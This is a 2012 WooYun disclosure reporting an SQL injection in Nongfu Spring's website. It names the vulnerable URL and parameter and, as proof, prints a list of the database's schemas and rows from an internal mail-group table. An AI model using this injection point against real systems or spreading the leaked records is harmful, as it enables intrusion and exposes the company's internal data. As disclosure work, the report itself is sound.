当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-05929

漏洞标题:某知名矿泉水官网存在Sql注入漏洞,导致相关信息泄漏

相关厂商:农夫山泉

漏洞作者: expdigger

提交时间:2012-04-11 10:45

修复时间:2012-05-26 10:46

公开时间:2012-05-26 10:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-04-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-05-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

没有对Sql注入攻击进行有效防范,此漏洞可直接导致公司涉密信息外泄。

详细说明:

直接提交Sql注入漏洞位置
http://www.nongfuspring.com/app/newsDetail.action?headtodetailId=853

漏洞证明:

由于数据敏感,请公司负责人,参考一下内容吧!
[*] AWARD
[*] BOAPP
[*] BUDGET
[*] CMS
[*] CMS_WW
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GCJK
[*] GTS
[*] LTWG
[*] MDSYS
[*] OABG
[*] ORDSYS
[*] OSAP
[*] OUTLN
[*] SCORES
[*] SCOTT
[*] SHOW
[*] SMSUSER
[*] SOP
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] VENDOR
[*] WF_ENGINE
[*] WMSYS
[*] WSAP
[*] XDB
[*] YDWG
[*] YY_WWW
-------------------------------------------
Database: SMSUSER
Table: B_MAIL_GROUP
+-------------+---------+------------+-------+----------------+----------------+----------+----------+-------------+
| CREATE_DATE | MEMBERS | MG_CREATER | MG_ID | MG_NAME | MG_NAME_CN | MG_ORGID | MG_STATE | MODIFY_DATE |
+-------------+---------+------------+-------+----------------+----------------+----------+----------+-------------+
| 25-MAY-06 | 6 | 62815 | 3 | oapm | OA项目组邮箱组 | 1702 | Y | 21-DEC-10 |
| 12-AUG-06 | 8 | 62815 | 4 | nfydsw_zb | 农夫移动商务总部项目组 | 1702 | Y | 21-DEC-10 |
| 12-AUG-06 | 16 | 62815 | 5 | nfydsw_dx | 农夫移动商务大区项目组 | 1702 | Y | 21-DEC-10 |
| 12-AUG-06 | 20 | 62815 | 6 | nfydsw_cs | 农夫移动商务城市项目组 | 1702 | Y | 21-DEC-10 |
| 26-SEP-06 | 31 | 62815 | 11 | mtnf | 农夫山泉06培训生 | 1702 | Y | 21-DEC-10 |

修复方案:

建议过滤请求中特殊字符,并提高网站安全审计等级!

版权声明:转载请注明来源 expdigger@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝